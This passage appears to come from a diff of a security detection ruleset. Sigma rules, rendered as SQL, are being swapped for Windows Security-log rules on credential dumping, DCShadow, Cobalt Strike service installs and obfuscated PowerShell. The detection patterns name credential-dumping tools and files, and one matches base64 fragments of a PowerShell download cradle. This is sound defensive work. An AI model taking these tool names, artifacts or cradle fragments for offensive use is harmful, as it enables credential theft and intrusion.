"filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.collection", + "attack.t1039" + ], + "falsepositives": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], + "filename": "win_security_susp_raccess_sensitive_fext.yml" + }, + { + "title": "Group Modification Logging", + "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "status": "stable", + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_group_modification_logging.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Scheduled Task Deletion", + "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "status": "experimental", + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "author": "David Strassegger, Tim Shelton", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "car.2013-08-001", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installation" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_scheduled_task_deletion.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ "attack.persistence", - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.t1134.005" ], "falsepositives": [ - "Unknown" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain 